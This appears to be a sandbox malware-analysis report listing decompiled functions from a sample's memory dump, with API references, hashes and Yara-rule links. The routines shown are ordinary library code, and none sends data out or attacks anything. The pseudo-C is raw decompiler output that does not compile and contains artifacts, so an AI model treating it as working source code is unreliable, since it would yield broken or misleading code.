Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3H_prolog3_Throw
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3648411918-3345525433
Opcode ID: 0151beedc6d1bf1d28395a336f8486c2784420539012708b8f16b2336606332e
Instruction ID: 532c32baee91f81a85dcbd39d41a0d4820655e655fdd1a6acec42c57d13146af
Opcode Fuzzy Hash: 0151beedc6d1bf1d28395a336f8486c2784420539012708b8f16b2336606332e
Instruction Fuzzy Hash: 27116131940318A9DF14EBA0D842BED77A5EF10718F443495EA04B7193DBB05A89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6167 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CA6167(void* __ecx) {
				void* _t13;
				void* _t23;

				0xe21503(0x44);
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t23 + 8)))) + 4))("OutputStringPointer", 0xf04050, __ecx + 0xc);
				if(_t13 == 0) {
					E00CA1E2C(_t23 - 0x28, "StringSink: OutputStringPointer not specified");
					 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
					E00CA4197(_t23 - 0x50);
					_t13 = _t23 - 0x50;
					 *((intOrPtr*)(_t23 - 0x50)) = 0xe92ca8;
					0xe2143b(_t13, 0xee8078, 1, _t23 - 0x28);
				}
				0xe214b2();
				return _t13;
			}

0x00ca616e
0x00ca6188
0x00ca618d
0x00ca6197
0x00ca619c
0x00ca61a9
0x00ca61b3
0x00ca61b6
0x00ca61be
0x00ca61be
0x00ca61c3
0x00ca61c8

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA616E

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA61BE

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

StringSink: OutputStringPointer not specified, xrefs: 00CA618F
OutputStringPointer, xrefs: 00CA617F

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 1139647276-1331214609
Opcode ID: ce33c4a528747f8488b244ac135831f568b7f089a3d1f428014a8e963a5912d3
Instruction ID: 254c37bf94fb05a46e770410d7b9856bd70145c5c01700d7dcd7ac72386e1b34
Opcode Fuzzy Hash: ce33c4a528747f8488b244ac135831f568b7f089a3d1f428014a8e963a5912d3
Instruction Fuzzy Hash: 97F05E70A40218ABDF00EBA0C806FDDB778AF64705F445058E619BB181CBB1AB49C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00D38587 Relevance: 6.2, APIs: 4, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00D38587(intOrPtr __ecx, signed short __edx, intOrPtr _a8) {
				void* _v0;
				signed int _v4;
				void* _v8;
				signed int _v12;
				void* _v16;
				WCHAR* _v20;
				struct HINSTANCE__* _v24;
				intOrPtr _v28;
				int _v32;
				char _v36;
				int _v40;
				int _v44;
				signed short _v50;
				void _v68;
				intOrPtr _v72;
				short _v74;
				signed int _v84;
				signed int _v88;
				void _v96;
				intOrPtr _t109;
				signed int _t120;
				void* _t124;
				intOrPtr* _t135;
				signed int _t154;
				intOrPtr _t156;
				intOrPtr _t159;
				intOrPtr* _t164;
				intOrPtr _t168;
				signed int _t169;
				signed short _t173;
				signed short _t179;
				void* _t183;
				intOrPtr* _t185;
				signed char* _t186;
				void* _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				signed int _t194;
				int _t196;
				signed int _t203;
				long long _t214;

				_t179 = __edx;
				_t109 = 0xe80007;
				0xe214d0(0x38);
				_t156 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x28)) != 0) {
					L14:
					0xe2149e();
					return _t109;
				} else {
					_t214 =  *((long long*)(__ecx + 0xb4));
					asm("fld1");
					asm("fucom st1");
					asm("fnstsw ax");
					st1 = _t214;
					if(4 != 0) {
						st0 = _t214;
					} else {
						_t154 =  *(__ecx + 0xac);
						 *((intOrPtr*)(__ecx + 8)) = 0;
						 *((long long*)(__ecx + 0xb4)) = _t214;
						if(_t154 != 0xffffffff) {
							 *(__ecx + 0xac) =  *(__ecx + 0xac) | 0xffffffff;
							 *(__ecx + 0xa8) = _t154;
						}
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						asm("movsd");
						 *((intOrPtr*)(_t156 + 0x54)) =  *((intOrPtr*)(_t156 + 0x5c));
						_t109 =  *((intOrPtr*)(_t156 + 0x60));
						asm("movsd");
						 *((intOrPtr*)(_t156 + 0x58)) = _t109;
						 *((intOrPtr*)(_t156 + 0x5c)) = 0;
						 *((intOrPtr*)(_t156 + 0x60)) = 0;
						asm("movsd");
						 *((intOrPtr*)(_t156 + 0x64)) = 0;
						 *((intOrPtr*)(_t156 + 0x68)) = 0;
						asm("movsd");
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t190 = _t156 + 0x8c;
					if( *_t190 == 0) {
						L9:
						E00D395F6(_t156);
						if( *0xf0d78c != 0) {
							_push( *((intOrPtr*)(_t156 + 0x54)));
							_push(_t190);
							E00D38061();
						}
						_t191 = _t156 + 0x90;
						E00D10DEA(_t191);
						 *_t191 = 0;
						_t192 = _t156 + 0x94;
						E00D10DEA(_t192);
						 *_t192 = 0;
						if( *((intOrPtr*)(_t156 + 0x30)) != 0) {
							E00D3705D(_t156, _t179, _t214,  *((intOrPtr*)(_t156 + 0xc)));
						}
						_t109 =  *((intOrPtr*)(E00D20FF2() + 0x20));
						 *((intOrPtr*)(_t156 + 0xb0)) = _t109;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t156 + 0x18)) == 0) {
							if( *((intOrPtr*)(_t156 + 0xc8)) == 0) {
								goto L14;
							} else {
								E00D10DEA(_t190);
								_t185 =  *((intOrPtr*)(_t156 + 0xc0));
								_t164 =  *((intOrPtr*)(_t156 + 0xdc));
								if(_t185 == 0) {
									goto L9;
								} else {
									while((0 | _t164 != 0x00000000) != 0) {
										_t179 =  *(_t185 + 8);
										_t185 =  *_t185;
										asm("sbb eax, eax");
										if(0 == _t179) {
											break;
										} else {
											_v32 = _v32 & 0x00000000;
											_v28 =  *_t164;
											_v24 =  *((intOrPtr*)(_t164 + 8));
											_v36 = 0xea53b8;
											_v4 = _v4 & 0x00000000;
											_v20 = _t179 & 0x0000ffff;
											if(E00D37919( &_v36, _t179, _t214, _t179 & 0x0000ffff,  *((intOrPtr*)(_t164 + 8))) == 0) {
												L21:
												_t196 = 0x2000;
												if( *((intOrPtr*)(_t156 + 0x34)) != 0 && E00D375DC(E00D20FF2()) == 0) {
													_t196 = 0x3000;
												}
												_t190 = LoadImageW(_v24, _v20, 0, 0, 0, _t196);
												_v16 = _t190;
											} else {
												_t190 = E00D1AA2D(_t156,  &_v36, _t179);
												_v16 = _t190;
												if(_t190 == 0) {
													goto L21;
												}
											}
											GetObjectW(_t190, 0x18,  &_v68);
											_t173 = _v50;
											 *(_t156 + 8) = _t173 & 0x0000ffff;
											if(_t173 < 0x20) {
												if(_t173 <= 8 ||  *((intOrPtr*)(_t156 + 0x34)) == 0) {
													if( *((intOrPtr*)(E00D20FF2() + 0x184)) != 0) {
														goto L30;
													}
												} else {
													L30:
													E00D37C66(_t156, _t179, _t214,  &_v16, 0, 0xffffffff, 0xffffffff);
													_t190 = _v16;
												}
											} else {
												_push( *((intOrPtr*)(_t156 + 0x3c)));
												_push(_t190);
												L34();
											}
											_push(0);
											_push(_t190);
											L00D34CAC(_t156, _t214);
											DeleteObject(_t190);
											_v4 = _v4 | 0xffffffff;
											_v36 = 0xea00f4;
											E00D1A062( &_v36);
											_t164 = _v28;
											if(_t185 != 0) {
												continue;
											} else {
												_t190 = _t156 + 0x8c;
												goto L9;
											}
										}
										goto L52;
									}
									E00D0BD09(_t164);
									asm("int3");
									_t120 =  *0xf02790; // 0x97f5acff
									_v12 = _t120 ^ _t203;
									if(GetObjectW(_v0, 0x54,  &_v96) != 0) {
										if(_v74 != 0x20) {
											goto L35;
										} else {
											_t168 = _v72;
											if(_t168 == 0) {
												goto L35;
											} else {
												_push(_t156);
												_push(_t190);
												_t194 = _v84 * _v88;
												if(_a8 == 0) {
													L46:
													if(_t194 > 0) {
														_push(_t185);
														_t89 = _t168 + 1; // 0x11
														_t186 = _t89;
														do {
															_t169 = _t186[2] & 0x000000ff;
															asm("cdq");
															_t186[1] = (_t186[1] & 0x000000ff) * _t169 / 0xff;
															asm("cdq");
															 *_t186 = ( *_t186 & 0x000000ff) * _t169 / 0xff;
															_t186 =  &(_t186[4]);
															asm("cdq");
															 *(_t186 - 5) = ( *(_t186 - 5) & 0x000000ff) * _t169 / 0xff;
															_t194 = _t194 - 1;
														} while (_t194 != 0);
													}
												} else {
													_t183 = 0;
													if(_t194 > 0) {
														_t85 = _t168 + 3; // 0x13
														_t135 = _t85;
														while(1) {
															_t159 =  *_t135;
															if( *((intOrPtr*)(_t135 - 1)) > _t159 ||  *((intOrPtr*)(_t135 - 2)) > _t159 ||  *((intOrPtr*)(_t135 - 3)) > _t159) {
																goto L46;
															}
															_t135 = _t135 + 4;
															_t183 = _t183 + 1;
															if(_t183 < _t194) {
																continue;
															} else {
															}
															goto L50;
														}
														goto L46;
													}
												}
												L50:
												_t124 = 1;
											}
										}
									} else {
										L35:
										_t124 = 0;
									}
									0xe2142c();
									return _t124;
								}
							}
						} else {
							E00D3768E(_t156, _t179, _t214,  *((intOrPtr*)(_t156 + 0x98)), 0);
							goto L9;
						}
					}
				}
				L52:
			}

APIs

__EH_prolog3.LIBCMT ref: 00D3858E
LoadImageW.USER32(?,00000000,00000000,00000000,00000000,00002000), ref: 00D3873E
GetObjectW.GDI32(00000000,00000018,?), ref: 00D38750
DeleteObject.GDI32(00000000), ref: 00D387A8

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Object$DeleteH_prolog3ImageLoad
String ID:
API String ID: 91933946-0
Opcode ID: bce5457acda44f3ab9d8c1573828862cf271ec85e9f077c93b372f12188569fa
Instruction ID: ecdceab9e9247687fe31a3c99195a9492810608e31738bda860d881686827329
Opcode Fuzzy Hash: bce5457acda44f3ab9d8c1573828862cf271ec85e9f077c93b372f12188569fa
Instruction Fuzzy Hash: BA7179B19013159BCF15EF64C881BEE7BB1FF09310F2841A9F819AB286CB749945DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00E48ECB Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 00E48F23
MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,00000000,00000000), ref: 00E48F71
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000), ref: 00E48FE7
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000), ref: 00E4900F

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ByteCharMultiWide$Getcvt
String ID:
API String ID: 3195005509-0
Opcode ID: 4eeedb46de3551419d5f14007171d15279463ab3fb19e483bf711278915c4767
Instruction ID: bdd4b444cfe39c7625bdde492e9d4fdc38600b3323482c0940d46be82defe20e
Opcode Fuzzy Hash: 4eeedb46de3551419d5f14007171d15279463ab3fb19e483bf711278915c4767
Instruction Fuzzy Hash: E241D131B0034AEFDB218F64E940BAEB7F6AF42318F149469F855AB181DB70AC48CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E25A96 Relevance: 6.1, APIs: 4, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E25B2C
__flush.LIBCMT ref: 00E25B4C
__write.LIBCMT ref: 00E25B7F
__flsbuf.LIBCMT ref: 00E25BAD

Part of subcall function 00E29047: __getptd_noexit.LIBCMT ref: 00E29047

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: bd2ac89ac9437c80d61201b6f6b6c707e90966f01a26e617327f5d0537541885
Instruction ID: 0a464f4011cf1bcb0fb7fca94e27d712e0dcf8bd03afce0799dda89cf000d432
Opcode Fuzzy Hash: bd2ac89ac9437c80d61201b6f6b6c707e90966f01a26e617327f5d0537541885
Instruction Fuzzy Hash: 1C410772B00F299FDB188F69EAD19AE77A5EF45364F24A23DE415E7240EB70DD408B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E30DA9 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E30DDF
__isleadbyte_l.LIBCMT ref: 00E30E0D
MultiByteToWideChar.KERNEL32(FFFDE8BD,00000009,?,E9413CBE,?,00000000,?,00000000,00000000,?,00CAE43D,?,\VlcpVideoV1.0.1), ref: 00E30E3B
MultiByteToWideChar.KERNEL32(FFFDE8BD,00000009,?,00000001,?,00000000,?,00000000,00000000,?,00CAE43D,?,\VlcpVideoV1.0.1), ref: 00E30E71

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 38e4e5de4f31c6b44e01627f9f98ab82d46dcf74d90b801e8aae720bd19faf62
Instruction ID: 809f592e5f7f165d1df0ea8eea13322dfb9a3178e85bf2d6925b892b6584c4f8
Opcode Fuzzy Hash: 38e4e5de4f31c6b44e01627f9f98ab82d46dcf74d90b801e8aae720bd19faf62
Instruction Fuzzy Hash: 3131D031600246AFDF218E76C858BBA7FE5FF41714F155928E825B71A1E731E850DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E56F69 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E56F70
std::_Cnd_waitX.LIBCPMT ref: 00E56F90

Part of subcall function 00E51764: __Mtx_init.LIBCPMT ref: 00E5176E

std::_Cnd_initX.LIBCPMT ref: 00E56FC9
std::_Cnd_initX.LIBCPMT ref: 00E56FF1

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$Cnd_init$Cnd_waitH_prolog3Mtx_init
String ID:
API String ID: 2294004850-0
Opcode ID: 15618d519c20b78b0ebe4452139973e21964e77bdf9414b3105529c9e42bc47d
Instruction ID: 7ce1107db59fe848b1185f42f60b584c8d7e8f3318e29b8bbe176d3ea68da487
Opcode Fuzzy Hash: 15618d519c20b78b0ebe4452139973e21964e77bdf9414b3105529c9e42bc47d
Instruction Fuzzy Hash: AE017170E00214BBCB20AF28AC4279937D4AB25B19F526869FD14F7392DB31CE459B50

Uniqueness

Uniqueness Score: -1.00%

Function 00E67D58 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00E67D7E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E67D9A
__CxxThrowException@8.LIBCMT ref: 00E67DA8
CreateThread.KERNEL32(00EFA47C,?,?,?,?,?), ref: 00E67DC3

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8LastThreadThrow
String ID:
API String ID: 4022716757-0
Opcode ID: c286fccb81c0d61fd402ba465ce90db338b65b27d80d516aa81d6aedea09d25a
Instruction ID: 79813b664d9391c0e94b075ed8af51ed587f3e157d06fe1ba801c3ab98260559
Opcode Fuzzy Hash: c286fccb81c0d61fd402ba465ce90db338b65b27d80d516aa81d6aedea09d25a
Instruction Fuzzy Hash: B0F0A47118420D7BDF11AFA1EC06FBA3B69AF05354F505851FE1CA4191E671C9209792

Uniqueness

Uniqueness Score: -1.00%

Function 00D10DEA Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00D10DEA(void** _a4) {
				void* _v4;
				void* __ebp;
				void* _t3;
				void* _t4;
				int _t8;
				void* _t9;
				signed int _t12;
				void** _t14;
				void* _t15;

				_t14 = _a4;
				if(_t14 == 0) {
					_t4 = E00D0BD09(_t9);
					asm("int3");
					_push(_t14);
					_t15 = _v4;
					if(_t15 != 0) {
						_t12 = GlobalFlags(_t15) & 0x000000ff;
						if(_t12 == 0) {
							L7:
							return GlobalFree(_t15);
						} else {
							goto L6;
						}
						do {
							L6:
							GlobalUnWire(_t15);
							_t12 = _t12 - 1;
						} while (_t12 != 0);
						goto L7;
					}
					return _t4;
				} else {
					if( *_t14 != 0) {
						_t8 = DeleteObject( *_t14);
						 *_t14 =  *_t14 & 0x00000000;
						return _t8;
					}
					return _t3;
				}
			}

APIs

DeleteObject.GDI32(?), ref: 00D10DFC
GlobalFlags.KERNEL32(?), ref: 00D10E1D
GlobalUnWire.KERNEL32(?), ref: 00D10E2E
GlobalFree.KERNEL32(?), ref: 00D10E38

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Global$DeleteFlagsFreeObjectWire
String ID:
API String ID: 1221732754-0
Opcode ID: 974624adfec9de86c550e2bb5d651ecfe78b3ddc5414d6bfaea34a3d7923fead
Instruction ID: cd16822f55a55bbb59ae4fc260c1b18b9b0186ecce86445c9095c79fa08ee8f4
Opcode Fuzzy Hash: 974624adfec9de86c550e2bb5d651ecfe78b3ddc5414d6bfaea34a3d7923fead
Instruction Fuzzy Hash: AEF09032101525BBC6212B86F808BEBBBACEF51761F180825F948762109BB458C087F5

Uniqueness

Uniqueness Score: -1.00%

Function 00E793EA Relevance: 6.0, APIs: 4, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

__malloc_crt.LIBCMT ref: 00E79408
std::exception::exception.LIBCMT ref: 00E79422
__CxxThrowException@8.LIBCMT ref: 00E79458

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8Throw__malloc_crtstd::exception::exception
String ID:
API String ID: 3183362523-0
Opcode ID: 0fd3c9a8c2412442b3f63eedfb4d8b475d7f062f7516ed4adc4a1ab1908e66e6
Instruction ID: 5ecb02135337ffa444c9f3be829e3cfdc39f57d3d625a8e3f68d7df96799edc6
Opcode Fuzzy Hash: 0fd3c9a8c2412442b3f63eedfb4d8b475d7f062f7516ed4adc4a1ab1908e66e6
Instruction Fuzzy Hash: D9F0627090030C7ACB10EFA4D986ADE7BF8DF10354F50E156F929BA242EB74D6498B80

Uniqueness

Uniqueness Score: -1.00%

Function 00D0F0EC Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00F0B598), ref: 00D0F11B
RtlInitializeCriticalSection.NTDLL(00000000), ref: 00D0F131
RtlLeaveCriticalSection.NTDLL(00F0B598), ref: 00D0F143
RtlEnterCriticalSection.NTDLL(00000000), ref: 00D0F14F

Part of subcall function 00D0F0C8: RtlInitializeCriticalSection.NTDLL(00F0B598), ref: 00D0F0E0

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: 9fa38d796dc48ce0fdc7b0e4a4ca7b5e8607cc564a7b0598e01a0aea1787e03a
Instruction ID: 0d79adc5e58b0335f2c62f52925f5285bb788a7709ffee6025b5b9ba4f44fb3e
Opcode Fuzzy Hash: 9fa38d796dc48ce0fdc7b0e4a4ca7b5e8607cc564a7b0598e01a0aea1787e03a
Instruction Fuzzy Hash: 6AF0B47260031DDFDA201F59EC49B29765CEB15365F981072F40EA25D2C7708C449BF3

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D377 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00F0B384), ref: 00D0D383
TlsGetValue.KERNEL32(00F0B368,?,?,?,?,00D0D33B,?,00000004,00D0D813,00D0BD57,00D0C775,00CA6215,?,?,?,00CA5C95), ref: 00D0D397
RtlLeaveCriticalSection.NTDLL(00F0B384), ref: 00D0D3AD
RtlLeaveCriticalSection.NTDLL(00F0B384), ref: 00D0D3B8

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

